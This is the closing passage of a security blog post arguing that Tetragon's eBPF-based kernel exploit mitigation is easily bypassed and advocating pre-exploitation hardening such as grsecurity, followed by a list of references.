Upon applying the policy provided by the Isovalent CTO, the Tetragon daemon terminated itself! This isn't surprising — other undesired terminations due to the coarse-grained policy preventing legitimate apps like sudo from working were observed during testing. Contrary to their blog update, such a simple-looking policy on all syscalls rather than just close() is likely not what mitigating should/would look like in production.

Regardless, the exploit naturally still worked fine.

"You win this round, but..."

By publishing this simple, trivially-reusable bypass, we expect Tetragon to attempt some workaround. This would of course ignore the point of this blog and be bypassed by another, equally-trivial ROP addition. It will be particularly notable if those involved in Tetragon push for upstream Linux to harden the code around kprobes in an attempt to prevent this one specific attack, as it'd be an implicit admission of the eBPF-based security approach being incapable of defending itself from the threat of kernel exploits. Time will tell, but having been involved in this space for over 20 years, the general scenario that seems to play out time and again (e.g. for KASLR) is that the side proposing and invested into the indefensible mitigation continues spending years propping it up with little fixes, providing useful fodder for security conference talks, while the underlying fundamentals don't change and the other side eventually gets tired of pointing this out.

There will be no CVE for the bypass described above, and we will not request one, because no actual vulnerability of a specific, defined security boundary is involved. The bypass is just one of innumerable possibilities that could be published or used, even without any knowledge of the post-exploitation Tetragon policies in place, contrary to what was claimed [8].

What's the alternative?

Typically, we prefer to let technical results speak for themselves, but in this instance, we were specifically asked to add a section about alternatives [9].

The Isovalent CTO asked on Twitter several times about alternatives, suggesting that since no alternatives exist, anything is better than nothing (despite, for instance, grsecurity existing for over two decades). So, what is the alternative to kernel post-exploitation "mitigation"?

The only sensible alternative is to add pre-exploitation defense. One should prevent kernel vulnerabilities from being present/reached, but if that still happens, one should make exploitation meaningfully harder (NB: not in a "two hours" sense, but in a "plenty of time to QA and roll out updates" sense) or impossible. Otherwise, it is too late and all bets are off.

Let's take grsecurity as an obvious example. It comes with several layers of protection against exploits, such as the one used above. We can use three examples which map directly to the first three points from our earlier graphic:

Unprivileged user namespaces are not supported
Slab allocations are hardened to hinder and detect heap-based memory corruption bugs
Control Flow Integrity enforced by RAP, to prevent Return Oriented Programming (ROP) attacks

Conclusion

Realistically, this blog will likely change little (other than perhaps the removal of the section in the Tetragon blog about preventing kernel exploits, as happened late yesterday), as obvious strong commercial incentives continue to exist for appearing to address the large problem of kernel exploits. We would echo the suggestion of several other experts that Tetragon instead focus its efforts on attack surface reduction and issues related to userland, as its too-late involvement in the process of kernel exploitation provides little more than a false sense of security.

References

[1] https://isovalent.com/blog/post/2022-05-16-tetragon

[2] https://twitter.com/_minipli/status/1527194006551142400

[3] https://github.com/cilium/tetragon

[4] https://github.com/cilium/tetragon/blob/main/docs/contributing/development/README.md

[5] https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c

[6] https://gist.github.com/tgraf/e5bd8fb4955cac139b02b370a87b268a

[7] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html#bypassing-smap

[8] https://twitter.com/tgraf__/status/1527701890842099717

[9] https://twitter.com/tgraf__/status/1527668174786899970